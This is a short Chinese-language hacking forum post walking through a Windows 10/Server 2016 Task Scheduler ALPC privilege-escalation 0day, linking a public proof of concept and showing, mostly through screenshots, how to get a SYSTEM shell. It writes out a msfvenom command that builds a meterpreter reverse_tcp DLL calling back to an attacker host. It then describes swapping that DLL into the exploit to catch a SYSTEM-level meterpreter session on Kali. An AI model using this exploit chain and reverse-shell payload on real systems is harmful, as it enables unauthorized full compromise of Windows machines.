windows-提权0day HACKAPT

windows-提权0day HACKAPT

hackersec已验证会员

黑客倉庫站長

管理成员
贡献: 3%
win10中任务调度服务导出的函数没有验证调用者的权限,任意权限的用户调用该函数可以获取系统敏感文件的写权限,进而提权。影响范围:windows10,windows server 2016昨天群里的基友们都复现了一遍也都成功了,也有基友在windows8实验了发现了也能提权成功。


准备工作:下载POC,windows 10 镜像,Process Explorer,CFF
POC:GitHub - SandboxEscaper/randomrepo: Repo for random stuff
windows10 ISO:msdn下载
Process Explorer:Process Explorer - Windows Sysinternals | Microsoft Docs
CFF:Explorer Suite – NTCore


首先打开一个notepad

windows提权0day HACKAPT-1.png


并没有什么不同,执行
windows提权0day HACKAPT-2.png


带有子进程conhost和notepad的cmd.exe已经生成为SYSTEM!



在kali执行 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f dll > ka.dll

PvFgQP.md.png


移动到windows10
windows提权0day HACKAPT-4.png


在CFF打开ALPC-TaskSched-LPE.dll替换其msf生成的dll,然后保存
windows提权0day HACKAPT-5.png






windows提权0day HACKAPT-6.png


kali中执行监听命令
windows提权0day HACKAPT-7.png


windows 10中执行
windows提权0day HACKAPT-8.png


返回kali可以发现已经成功的反弹了一个meterpreter,并且是system权限
windows提权0day HACKAPT-9.png






windows提权0day HACKAPT-10.png






windows提权0day HACKAPT-11.png
 
后退
顶部